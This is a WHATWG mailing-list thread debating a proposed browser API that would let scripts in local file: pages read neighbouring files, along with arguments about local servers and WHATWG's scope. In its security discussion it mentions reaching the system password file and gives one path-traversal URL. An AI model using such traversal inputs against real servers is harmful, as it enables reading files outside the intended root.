Discussion:
[whatwg] Accessing local files with JavaScript portably and securely
David Kendal
2017-04-09 09:51:14 UTC
Permalink
Moin,

Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.

Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.

This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.

This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
Chromium bug reporter: 'I've filed hundreds of Chrome bugs and I would
rather see this fixed than any of them'
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.

I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even if only for development
purposes.


A proposed solution, though far from the only one possible:

There should be a new API something like this:

window.requestFilesystemPermission(requestedOrigin);

which does something like

- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.

- If the current page origin is not a URL on the file: protocol, raise a
permissions error.

- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.

- The browser displays an alert to the page user showing the name and
path of the directory for which this permission has been requested.
The user can then choose to allow or deny access.

- If the user chose not to allow access to the files, false is returned
or some other error is raised.

- If they chose to allow access, return true.

- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.

requestedOrigin is allowed to be an absolute or relative URI.

Some useful Fetch semantics for file: URLs should also be defined.
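
For concreteness, the containment check in the third point could look
something like the following sketch (mayRequestAccess is a hypothetical
internal helper, not part of the proposed surface):

  // May a page at pageURL request access to requestedURL?
  // Assumes both are URL objects, and that a relative requestedOrigin
  // has already been resolved against the page's URL by the caller.
  function mayRequestAccess(pageURL, requestedURL) {
    if (pageURL.protocol !== 'file:' ||
        requestedURL.protocol !== 'file:') return false;
    // Directory containing the current page, e.g. '/mnt/html/'.
    var pageDir = pageURL.pathname.replace(/[^\/]*$/, '');
    var requestedDir = requestedURL.pathname;
    if (!requestedDir.endsWith('/')) requestedDir += '/';
    // Allow the page's own directory or any parent of it, so
    // file:///mnt/html/index.html may ask for /mnt/html or /mnt,
    // but never for /etc.
    return pageDir.startsWith(requestedDir);
  }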

I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so;
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.

This is also a beneficial property for those using file:// URLs for
development purposes.
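
To illustrate, a page written against this proposal might do something
like this (loadChapter and the chapters/ directory are made-up
examples; requestFilesystemPermission is the proposed API above):

  // Works the same from file: and from http(s):, as long as only
  // relative URLs are fetched.
  function loadChapter(name) {
    if (location.protocol === 'file:' &&
        !window.requestFilesystemPermission('.')) {
      throw new Error('local file access was denied');
    }
    return fetch('chapters/' + name + '.html')
      .then(function (response) { return response.text(); });
  }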

Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.


Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
Melvin Carvalho
2017-04-09 10:11:38 UTC
Permalink
Post by David Kendal
[...]
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
Thanks for the pointer, I just starred this too. I am currently hitting a
wall with this issue as well.

I have looked for a way to override this, but cannot find anything. As
a consequence, I have switched to Electron, which seems to have this
feature.
Post by David Kendal
window.requestFilesystemPermission(requestedOrigin);
[...]
+1 looks like a good solution. Another way would be to set a flag in the
options.
Jonathan Zuckerman
2017-04-09 12:23:42 UTC
Permalink
The solution most developers use is to run a simple web server that
hosts static content; it's a much simpler solution than the API you
propose and requires no changes to the spec. It doesn't address the
CD-ROM use case, though.
Philipp Serafin
2017-04-09 13:48:32 UTC
Permalink
Note also that the HTTP server solution requires you to ship a binary (the
server) with your files, therefore sacrificing platform independence and
requiring the user to run an untrusted binary, all just to show some HTML
files.
Post by Jonathan Zuckerman
The solution most developers use is to run a simple web server that
hosts static content [...]
David Kendal
2017-04-10 21:43:14 UTC
Permalink
Post by Philipp Serafin
Note also that the HTTP server solution requires you to ship a binary
(the server) with your files, therefore sacrificing platform
independence and requiring the user to run an untrusted binary, all
just to show some HTML files.
This is my main concern with the 'ship a server' approach.

In addition, though local servers are easy for experienced developers
to spin up, it's an extra, potentially confusing step for developers
who are brand new to the web platform. It's an additional concept to
grasp before you can even get started, and those should be absolutely
minimized. Beginners may not even have HTTP hosting space of their own
yet, and may be dependent on their local filesystem to see their pages.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
A, the noblest, most primordial of all sounds, resounding fully from
chest and throat, the first sound that the child learns to produce, and
the easiest, which the alphabets of most languages rightly place at
their head. — first entry in the Grimms' Deutsches Wörterbuch
Jan Tosovsky
2017-04-09 19:36:34 UTC
Permalink
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed, so it can be exported as a
JSON file and then linked via the HTML header in every HTML file where
it is needed. This structure is then directly available for further
processing.

However, I am not sure this covers your use case.

Jan
Gregg Tavares
2017-04-09 20:33:27 UTC
Permalink
I know this doesn't address your CD-ROM/USB stick situation but FYI...

for the dev situation there are many *SUPER* simple web servers

https://greggman.github.io/servez/

https://github.com/cortesi/devd/

https://github.com/indexzero/http-server/

https://docs.python.org/2/library/simplehttpserver.html (not recommended,
haven't tried the python 3 one)

https://chrome.google.com/webstore/detail/web-server-for-chrome/ofhbbkphhbklhfoeikjpcbhemlocgigb?hl=en
(soon to be deprecated)

more here
http://stackoverflow.com/questions/12905426/what-is-a-faster-alternative-to-pythons-http-server-or-simplehttpserver
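
(These are typically run from the directory you want to serve; e.g. the
Python 2 module linked above is started with

  python -m SimpleHTTPServer

and serves the current directory on port 8000.)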
duanyao
2017-04-12 05:07:50 UTC
Permalink
We should be aware of the security risks when recommending a "simple
web server".

* Most (if not all) simple web servers don't block access from
non-local hosts by default, which can leak users' files. Although your
firewall can block them for you, users do need to unblock non-local
hosts sometimes (e.g. to test with a smart phone), so some may have
whitelisted the server anyway.

* Even if non-local hosts are blocked, access by non-current users (on
the same OS) can't easily be blocked by a web server. In contrast,
file:// access is subject to file permission checks.

* Most (if not all) simple web servers are hobby projects, so they
probably lack sufficient security auditing. E.g. how are URLs like
"/foo/../../../bar" handled, to prevent escaping from the root
directory?

Those risks may be non-issues for experienced developers, but they do
affect newbie developers and normal users. So in my opinion, it is much
better to improve and standardize file: URL handling in browsers.
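
(For what it's worth, the first risk can at least be mitigated by
binding the server to the loopback interface; e.g. Python 3's built-in
server supports

  python3 -m http.server --bind 127.0.0.1

though the other issues remain.)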

Regards,

Duan, Yao
David Kendal
2017-04-10 21:47:14 UTC
Permalink
Post by Jan Tosovsky
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed, so it can be exported as a
JSON file and then linked via the HTML header in every HTML file where
it is needed. This structure is then directly available for further
processing.
However, I am not sure this covers your use case.
I'm not sure either, because I don't understand what you're proposing.
What feature of the HTML header enables this functionality? (For an
arbitrary number of files which may be wanted by an arbitrary number
of other files, and which could be very large.)
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
The House of Commons [is] like Noah’s Ark—a few men & many beasts.
— Samuel Taylor Coleridge
Jan Tosovsky
2017-04-10 22:38:21 UTC
Permalink
Post by David Kendal
I'm not sure either, because I don't understand what you're proposing.
What feature of the HTML header enables this functionality? (For an
arbitrary number of files which may be wanted by an arbitrary number
of other files, and which could be very large.)
Imagine e.g. WebHelp composed of a collection of static files, with a
Table of Contents (ToC) in the left pane. It is not very efficient to
generate a large ToC into every single HTML file. If you extract the
ToC into a dedicated HTML page, it cannot be imported by standard means
directly into another HTML page (analogously to XML Inclusions [1]).
You have to use either an IFrame or, better, provide the ToC as a JSON
file. JSON is a kind of JavaScript, which can be linked via the
<script> tag in the HTML header. It is hence loaded together with the
page and you can manipulate it further with JavaScript: in the case of
a ToC, render the data as an itemized list with proper CSS classes, and
even detect whether an item matches the current page (if so, use a
different class).

So basically you need
(1) JSON
(2) link to that JSON in your HTML file
(3) JavaScript in your HTML file, which renders JSON data to the page

In my case both the WebHelp pages and the JSON are generated via XSLT
from an XML source.

If you have to list the file structure of a CD-ROM, I suppose it is
fixed, so it doesn't need to be determined dynamically; it can be
prepared in advance. I can imagine a simple Java 'walker' [2] which
could traverse all the folder content and export all necessary data
into a JSON structure.
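
For illustration, a minimal sketch of this (all file, variable and
element names are only examples):

  // toc.js, generated in advance. It defines the structure as a
  // global variable, since a plain <script> tag cannot load raw JSON.
  var toc = [
    {href: "intro.html",    title: "Introduction"},
    {href: "chapter1.html", title: "Chapter 1"}
  ];

  <!-- in the header of every generated page: -->
  <script src="toc.js"></script>

  <!-- at the end of the body (assuming the page contains an empty
       <div id="toc-pane"></div>), render the ToC and mark the entry
       that matches the current page: -->
  <script>
  var list = document.createElement("ul");
  toc.forEach(function (entry) {
    var item = document.createElement("li");
    var link = document.createElement("a");
    link.href = entry.href;
    link.textContent = entry.title;
    item.appendChild(link);
    if (location.pathname.split("/").pop() === entry.href)
      item.className = "current";
    list.appendChild(item);
  });
  document.getElementById("toc-pane").appendChild(list);
  </script>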

Jan


_____________
[1] https://www.w3.org/TR/xinclude/
[2] https://docs.oracle.com/javase/tutorial/essential/io/walk.html
Patrick Dark
2017-04-11 12:04:42 UTC
Permalink
Post by Jan Tosovsky
[...] If you extract the ToC into a dedicated HTML page, it cannot be
imported by standard means directly into another HTML page. You have
to use either an IFrame or, better, provide the ToC as a JSON file.
[...]
There's no reason to use JavaScript for displaying a table of contents.
If the file structure is fixed, you can simply hard-code static XML
entries in an XSLT stylesheet.

Granted, Google Chrome won't do XSLT transformations for local files,
but that seems to be more of a browser deficiency than a specification
issue. To accommodate Chrome's deficiency while keeping maintenance down
(i.e., avoiding putting a copy of the TOC in every HTML file), one could
create a standalone index page. That's less convenient than an
XSLT-based navigation panel, but it's doable today.
Jan Tosovsky
2017-04-11 19:22:47 UTC
Permalink
Post by Patrick Dark
Post by Jan Tosovsky
... there are many possible uses for local static files
accessing other local static files: the one I have in mind
is shipping static files on CD-ROM or USB stick...
So basically you need
(1) JSON /* the folder structure stored in JavaScript objects */
(2) link to that JSON in your HTML file
(3) JavaScript in your HTML file, which renders JSON data to the page
In my case both WebHelp pages and JSON is generated via XSLT from XML source.
There's no reason to use JavaScript for displaying a table of contents.
If the file structure is fixed, you can simply hard-code static XML
entries in an XSLT stylesheet.
While slightly off-topic: my goal was to reduce the final HTML file
size. The more pages, the larger the ToC, so the total size of the set
grows roughly quadratically. If the ToC is extracted and then just
linked from every HTML page, the total size is reduced significantly.
If the documentation is shipped together with a desktop app in the form
of an installer, it is better to keep it as small as possible.
Post by Patrick Dark
Granted, Google Chrome won't do XSLT transformations for local files,
but that seems to be more of a browser deficiency than a specification
issue.
Sorry for not being precise: the mentioned XSLT transformation (for my
DocBook XML) is performed once, outside the browser, producing linked
static HTML pages (and also the JSON with the file hierarchy). I wanted
to emphasize that generating the JSON can, in specific cases, be nicely
integrated into the existing generation workflow (the file structure is
already available in the DocBook XSL stylesheets for other purposes, so
it was quite easy to reuse it to generate the JSON for the ToC).

Jan
duanyao
2017-04-12 08:39:16 UTC
Permalink
Post by Patrick Dark
There's no reason to use JavaScript for displaying a table of
contents. If the file structure is fixed, you can simply hard-code
static XML entries in an XSLT stylesheet.
JavaScript and XHR/fetch would be unavoidable if large amounts of data
have to be processed, even for local web pages with a fixed structure.
E.g.:

* Large 3D model files to be used in WebGL.
* Media files not supported by browsers natively, with decoders in JS,
e.g. MIDI, WebP, AV1...
* A programming tutorial with many code samples, where the web page
loads, parses, formats and shows those samples inline. The samples
should also be directly editable and compilable.
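
The tutorial case, for instance, amounts to something like this (file
and element names are hypothetical), which fails from file: in current
browsers:

  // Load a code sample shipped next to the page and show it inline.
  fetch("samples/hello.c")
    .then(function (response) { return response.text(); })
    .then(function (code) {
      document.querySelector("#sample-1 code").textContent = code;
    });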
Brett Zamir
2017-04-10 03:53:28 UTC
Permalink
I support such an approach and have found the usual "use a server"
response a bit disheartening. Besides the stated cases, I believe it
should just be easy for new programmers, children, etc., to try out
simple projects with nothing more than a browser and text editor (and
the console is not enough).

Another use case is for shareable utility web apps, such as doing text
replacements offline, without the privacy/security fear that the text
one pastes can be read (if remote file access can optionally be
prevented).

I also support an approach which grants privileges beyond just the
directory where the file is hosted and its subdirectories, as this is
too confining: e.g., if one has used a package manager like npm to
install into root/node_modules, then root/examples/index.html could not
access it.

FWIW, Firefox previously had support for `enablePrivilege` which allowed
local file access (and other privileged access upon consent of the user)
but was removed: https://bugzilla.mozilla.org/show_bug.cgi?id=546848

I created an add-on, AsYouWish, to allow one to get this support back,
but later iterations of Firefox broke the code on which I was relying,
and I was not able to work around the changes. It should be possible,
however, to implement a good deal of its capabilities now in
WebExtensions, to allow reading local files (even optionally from a
remote server) upon user permission, though this would not work around
the problem of file:// URLs just working as-is.

For one subset of the local file use case (and of less concern,
security-wise), local data files, I also created an add-on, WebAppFind
(though I only got to Windows support), which allowed the user to open
local desktop files into a web app without a need for drag-and-drop
from the desktop to the app.

One only needed to double-click a desktop file (or use "Open with..."),
having previously associated the file extension with a binary which
would invoke Firefox with command-line arguments that my add-on would
pick up. Reading from a local "filetypes.json" file in the same
directory (or, alternatively, using custom web protocols where sites
had previously registered to gain permission to handle certain local
file types), it would determine which web site had permission to be
given the content, and optionally to be allowed to write back any
modified data to the user's local file as well (all via
`window.postMessage`). (The add-on didn't support arbitrary access to
the file system, which has some use cases, such as a local file browser
or a wiki that can link to one's local desktop files in a manner that
allows opening them; but it at least allowed web apps to become
first-class consumers of one's local data.)

But this add-on also broke with later iterations of Firefox (like so
many other add-ons, unlike, in my view, the much better-stewarded,
backward-compatible web), and I haven't had a chance or energy to
update it for WebExtensions; but such an approach might work for you if
implemented as a new add-on, pending any adoption by browsers.

Best wishes,

Brett
Melvin Carvalho
2017-04-10 22:19:07 UTC
Permalink
Post by David Kendal
[...]
I thought I'd share this design issues note by Tim Berners-Lee, on this
topic, which some may find interesting

https://www.w3.org/DesignIssues/HTTPFilenameMapping.html

"It is actually pretty interesting to live on the edge, or more
specifically on the intersection of these worlds where you can address the
same files both as local files and as resources on the web. Why do both?
Well, different things work better in different worlds"
Patrick Dark
2017-04-11 11:55:26 UTC
Permalink
Post by David Kendal
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
I can't see this being addressed. The only good reason to distribute an
application this way is because you want it to be confidential, and
there's no incentive to accommodate what one might call "walled
gardens" in HTML, because they naturally have a limited audience. For
example, if your application is being distributed via CD, that implies
that the number of application instances will be limited to the number
of physical media items, that the application will never be updated,
and that the application therefore isn't particularly important.

If you really want a private HTML-based application, you might consider
a password-protected webpage. If the application isn't a throwaway app,
you'll want to do that anyway, so there isn't anything lost from the
upkeep required of maintaining an online server.

As for development, it's trivial to install a local server using an
offering like XAMPP and this gives you the power to test things like URL
redirects that you can't test otherwise.
Philipp Serafin
2017-04-11 12:50:01 UTC
Permalink
[...] The only good reason to distribute an application this way is
because you want it to be confidential [...]
Another use-case would be to develop an HTML app that does not require
internet access.
If you really want a private HTML-based application, you might consider
a password-protected webpage. If the application isn't a throwaway app,
you'll want to do that anyway, so there isn't anything lost from the
upkeep required of maintaining an online server.
Why would I even want to run a server?
Domenic Denicola
2017-04-11 16:01:35 UTC
Permalink
I can't see this being addressed. The only good reason to distribute an application this way is because you want it to be confidential and there's no incentive to accommodate what one might call "walled gardens"
in HTML because they naturally have a limited audience.

Bingo. This mailing list is for developing technology for the world wide web, not for peoples' local computers.

You can use the same technology that people use on the web for local app development---many people do, e.g. Apache Cordova, Microsoft's Metro/Modern/UWP apps, or GitHub's Electron. But all those technologies are outside the standards process, and in general are not the focus of browser vendors in developing their products (which are, like the standards process, focused on the web).
Philipp Serafin
2017-04-11 16:44:03 UTC
Permalink
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world wide
web, not for peoples' local computers.
Doesn't that somewhat clash with the recent push to offline web apps and
the expectation/hope that pure HTML/JS/CSS might at some point be a
suitable replacement for native apps?
David Kendal
2017-04-11 16:46:57 UTC
Permalink
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world
wide web, not for peoples' local computers.
The World Wide Web includes peoples' own computers. file:// is a URI
scheme for exactly that reason. Every browser since WorldWideWeb.app
for the NeXT has supported it, and every browser will support it
forever, I hope. (Until it gets the <ISINDEX> treatment, I suppose,
since the current generation of web standards writers seem to regard
the idea of platform stability with extreme contempt.)

You cannot escape this simply by redefining what you consider 'the web'
to be.

(file:// is even 'world wide', to some extent. On computers with AFS
installed, all URIs beginning with file:///afs/ will always resolve to
the exact same files.)
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
If one meets a powerful person […] one can ask five questions: what
power do you have; where did you get it; in whose interests do you
exercise it; to whom are you accountable; and, how can we get rid of
you? Anyone who cannot answer the last of those questions does not
live in a democratic system. — Tony Benn, Commons deb., 16 Nov. 1998
Patrick Dark
2017-04-11 18:50:12 UTC
Permalink
Post by David Kendal
The World Wide Web includes peoples' own computers. file:// is a URI
scheme for exactly that reason. [...]
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
Delfi Ramirez
2017-04-12 01:23:14 UTC
Permalink
Dear all:

I agree with the need to consider file:// (or at least to re-consider
the missing functionality) as applicable to files and directories of
HTML documents stored on physical devices (like USBs or CD-DVDs), even
if it might sound useless in the _cloudy_ times we live in.

These HTML docs MUST be viewable using a modern browser and listening
to DOM events.

This required or proposed functionality works well, according to
standards, in the following scenarios:

When the HTML document (static or not) links to other docs published on
the WWW (as was usual in DVDs and CDs from the ages of the multimedia
hype), like videos or external sites.

Accessibility, for places on earth where you or the receiver need to
store and view HTML content, and where connection speeds may not be
what we are used to (_a friend who just came back from her NGO's
mission comes to mind -- there, the term 'slow connection' becomes a
euphemism_).

Just mumbling, if it helps the goals.

Kind Regards

###########################

Note on Patrick's point et al.: the WWW is a protocol for HTTP(S) via
TCP/IP.

* _USB storage devices: fdisk, mkfs, mount/umount, file operations,
play a DVD movie and record a DVD-R media._
* _USB keyboards and USB mice._
* _USB webcams and USB speakers._
* _USB printers, USB scanners, USB serial converters and USB Ethernet
interfaces_...

A GENERAL USB DEVICE SHARING SYSTEM OVER AN IP NETWORK ACCOMPLISHES THE
WWW PROTOCOL.

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]



Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mailto:***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
David Kendal
2017-04-14 16:58:01 UTC
Permalink
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.

If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)

As the divinely-appointed guardians of the HTML spec, the responsibility
of the WHAT WG is to ensure that HTML is a useful platform for documents
and applications wherever HTML files can be opened from, whether that's
HTTP(S), FTP, or local files. Where 'the web' starts and stops in this
spectrum of possible protocols is of no import.

On that note I also see that the Fetch API has stubbed out the
specification of file: and ftp: URL semantics for definition in the
future at <https://fetch.spec.whatwg.org/#basic-fetch>.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
In politics, obedience and support are the same thing.
— Hannah Arendt
Domenic Denicola
2017-04-14 17:30:29 UTC
Permalink
Post by David Kendal
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
I don't intend to take direction on how I spend my time from you. I'd be curious as to whether you can find any statement of the WHATWG's responsibilities to back up your claim on my time.
Post by David Kendal
On that note I also see that the Fetch API has stubbed out the specification
of file: and ftp: URL semantics for definition in the future at
<https://fetch.spec.whatwg.org/#basic-fetch>.
That's not an accurate statement. Rather, Anne has left that as implementation-defined, since it isn't part of the interoperable world wide web.
David Kendal
2017-04-14 17:48:17 UTC
Permalink
Post by Domenic Denicola
Post by David Kendal
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
I don't intend to take direction on how I spend my time from you.
Fine; you don't personally have to work on solving this problem, then.
But so far your response to my "I have a problem!" has been to say "you
are incorrect for having that problem", which is not a valuable use of
anybody's time or attention. You are more than welcome to ignore the
problem entirely and leave it up to other WHAT WG participants, several
of whom have expressed interest in working on this (though I trust
that, if the outcome is changes or additions to the spec, your employer
will faithfully implement them in its browser).
Post by Domenic Denicola
I'd be curious as to whether you can find any statement of the
WHATWG's responsibilities to back up your claim on my time.
This is getting silly. <https://wiki.whatwg.org/wiki/FAQ#The_WHATWG>
says the WHAT WG's purpose is to 'evolve the Web'; since file: URIs
are part of the web, this problem falls within the WHAT WG's remit.

If you continue with this argument, I will simply ignore you. I am more
interested in debating how to solve the problem than quibbling over who
should solve it.
Post by Domenic Denicola
Post by David Kendal
On that note I also see that the Fetch API has stubbed out the
specification of file: and ftp: URL semantics for definition in the
future at <https://fetch.spec.whatwg.org/#basic-fetch>.
That's not an accurate statement. Rather, Anne has left that as
implementation-defined, since it isn't part of the interoperable world
wide web.
The wording "For now, unfortunate as it is" introducing that section
sure sounds to me like this is something that is intended to be
addressed by the spec at a later date. Indeed, at the top of this thread
I proposed one step towards doing that.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
+49 159 03847809

The Art of Biography
is different from Geography.
Geography is about Maps,
but Biography is about Chaps.
— Edmund Clerihew Bentley, Biography for Beginners (1905)
Domenic Denicola
2017-04-14 18:09:55 UTC
Permalink
Post by David Kendal
This is getting silly. <https://wiki.whatwg.org/wiki/FAQ#The_WHATWG>
says the WHAT WG's purpose is to 'evolve the Web'; since file: URIs are part
of the web, this problem falls within the WHAT WG's remit.
file: URLs are part of the web, e.g. parsing such URLs when used in <a> tags, just like gopher: URLs or mailto: URLs. The behavior once navigating to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside the scope of the WHATWG's work.
Post by David Kendal
If you continue with this argument, I will simply ignore you. I am more
interested in debating how to solve the problem than quibbling over who
should solve it.
Please do so. I'm just stating the WHATWG's position on this for the clarity of other participants of this list; I would certainly prefer that you do not engage further in attempting to redefine the WHATWG's scope.
duanyao
2017-04-17 12:54:05 UTC
Permalink
Post by Domenic Denicola
Post by David Kendal
This is getting silly. <https://wiki.whatwg.org/wiki/FAQ#The_WHATWG>
says the WHAT WG's purpose is to 'evolve the Web'; since file: URIs are part
of the web, this problem falls within the WHAT WG's remit.
file: URLs are part of the web, e.g. parsing such URLs when used in <a> tags, just like gopher: URLs or mailto: URLs. The behavior once navigating to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside the scope of the WHATWG's work.
This still doesn't explain why the file: protocol CAN'T be part of the
web (and inside the scope of the WHATWG).
No one is asking for web over gopher or ftp, because http is a better
alternative; no one is asking for web over mailto:, because it is not a
protocol for transporting data. But many people are asking for web over
the file: protocol, because (1) the file: protocol shares a lot of
characteristics with http, which makes them believe that the web can
work reasonably well over it -- with some effort; and (2) http can't
cover some use cases of the file: protocol, and they believe these use
cases are important.

The argument that http: is for "open" or "world wide" content and
file: is for "walled gardens" is rather weak. Plenty of software on
Linux ships manuals in HTML format, and they are open and world-wide.
People can also distribute HTML files via ed2k or BitTorrent, and those
are open and world-wide too. In contrast, iCloud, Google Drive, and
OneDrive are private by default, although http and web technologies
are used.
Post by Domenic Denicola
Post by David Kendal
If you continue with this argument, I will simply ignore you. I am more
interested in debating how to solve the problem than quibbling over who
should solve it.
Please do so. I'm just stating the WHATWG's position on this for the clarity of other participants of this list; I would certainly prefer that you do not engage further in attempting to redefine the WHATWG's scope.
Anne van Kesteren
2017-04-17 13:04:24 UTC
Permalink
Post by Domenic Denicola
file: URLs are part of the web, e.g. parsing such URLs when used in <a>
tags, just like gopher: URLs or mailto: URLs. The behavior once navigating
to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside
the scope of the WHATWG's work.
This still doesn't explain why the file: protocol CAN'T be part of the
web (and inside the scope of the WHATWG).
Because it's a mechanism for addressing resources on a specific OS.
It's not a mechanism for addressing resources on the web.
--
https://annevankesteren.nl/
duanyao
2017-04-17 13:32:43 UTC
Permalink
Post by Anne van Kesteren
Post by Domenic Denicola
file: URLs are part of the web, e.g. parsing such URLs when used in <a>
tags, just like gopher: URLs or mailto: URLs. The behavior once navigating
to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside
the scope of the WHATWG's work.
This still doesn't explain why the file: protocol CAN'T be part of the
web (and inside the scope of the WHATWG).
Because it's a mechanism for addressing resources on a specific OS.
It's not a mechanism for addressing resources on the web.
So you mean the file: protocol is not portable? For absolute file:
URLs, true; for relative URLs, mostly untrue.

When writing web pages, no one uses absolute file: URLs in practice, so
this is a non-issue.
Anne van Kesteren
2017-04-17 13:39:11 UTC
Permalink
So you mean the file: protocol is not portable? For absolute file:
URLs, true; for relative URLs, mostly untrue.
When writing web pages, no one uses absolute file: URLs in practice, so
this is a non-issue.
Neither is portable or part of the web, since you don't allocate
resources on someone else's machine that way. (And even in the sense
that you mean it, they're not portable, due to the different styles of
matching: case-insensitivity, Unicode normalization, custom variants of
Unicode normalization, bytes vs. code points, etc.)
--
https://annevankesteren.nl/
duanyao
2017-04-17 15:53:32 UTC
Permalink
Post by Anne van Kesteren
So you mean the file: protocol is not portable? For absolute file:
URLs, true; for relative URLs, mostly untrue.
When writing web pages, no one uses absolute file: URLs in practice, so
this is a non-issue.
Neither is portable or part of the web, since you don't allocate
resources on someone else's machine that way. (And even in the sense
that you mean it, they're not portable, due to the different styles of
matching: case-insensitivity, Unicode normalization, custom variants of
Unicode normalization, bytes vs. code points, etc.)
When we want to write a web application portable across multiple
server OSes, these issues can happen too. The rules of thumb are (1)
assume case-sensitivity, but don't create file names which differ only
in casing; and (2) avoid characters subject to Unicode normalization
in file names.

I think "portable" is never absolute. There are always
incompatibilities between browsers, and even a once-standardized
feature can be deprecated or removed in the future, e.g.
`window.showModalDialog()`, `<applet>` and `<keygen>`.
Anne van Kesteren
2017-04-17 16:03:23 UTC
Permalink
Post by duanyao
When we want to write a web application portable across multiple server
OSes, these issues could happen too.
Yes, but then you run into implementation bugs. Which are a very
different category from proprietary OS design decisions.
Post by duanyao
I think "portable" is never absolute.
Sure, but at least that's the goal for those participating in the
non-proprietary web ecosystem.
Post by duanyao
There are always incompatibilities
between browsers, and even a once-standardized feature can be
deprecated or removed in the future, e.g. `window.showModalDialog()`,
`<applet>` and `<keygen>`.
This happens rarely and when it happens it's a very considered
decision involving lots of people. It's usually related to complexity,
lack of use, and security.
--
https://annevankesteren.nl/
duanyao
2017-04-17 17:19:31 UTC
Permalink
Post by Anne van Kesteren
Post by duanyao
When we want to write a web application portable across multiple server
OSes, these issues could happen too.
Yes, but then you run into implementation bugs. Which are a very
different category from proprietary OS design decisions.
I'm not sure what "implementation bugs" means here -- bugs in the web
application, or in the server OSes?

It seems you imply that "OS design decisions" are arbitrary or unstable
over time, which is not quite true. As to filesystem semantics, all
major OSes have been very stable over the last few decades and are
unlikely to diverge dramatically in the next decade. Apple's HFS+
normalizes Unicode, but the newer APFS doesn't, which converges with
the other OSes.
Post by Anne van Kesteren
Post by duanyao
I think "portable" is never absolute.
Sure, but at least that's the goal for those participating in the
non-proprietary web ecosystem.
I think you overstate the proprietariness of filesystem semantics.
Developers and users have made use of local HTML files (in a
cross-platform manner) for decades and generally feel positive about
it. Please don't ignore this.
Post by Anne van Kesteren
Post by duanyao
There are always incompatibilities
between browsers, and even once standardized feature can be
deprecated/removed in future, e.g. `window.showModalDialog()`,
`<applet>` and `<keygen>`.
This happens rarely and when it happens it's a very considered
decision involving lots of people. It's usually related to complexity,
lack of use, and security.
Sure. Proprietary OSes don't change their core APIs in incompatible
ways for no good reason, either.

I don't expect a local web app tested on major OSes today to stop
working tomorrow due to a filesystem API change.
Anne van Kesteren
2017-04-18 08:08:15 UTC
Permalink
Searching Google for "offline webapp discussion group" turns up
https://www.w3.org/wiki/Offline_web_applications_workshop
and that's sadly from 2011.
There is https://www.w3.org/TR/offline-webapps/
Right, those are about making applications distributed over HTTPS work
when the user is not connected. That idea doesn't necessitate file
URLs and we're still working towards that ideal with Fetch, HTML, and
Service Workers. All browsers seem on board with that general idea
too, which is great.
Now I know that the WHATWG and the W3C Working Groups are not the same
thing, but if the W3C thinks that offline apps are part of the web and
the WHATWG does not, then that creates a huge chasm, as the WHATWG
would then ignore all offline stuff.
The WHATWG collaborates with a W3C group on service workers. WHATWG
ends up being responsible for the underpinnings defined in Fetch and
HTML.
I always assumed that the WHATWG was a fast-track variant of the W3C:
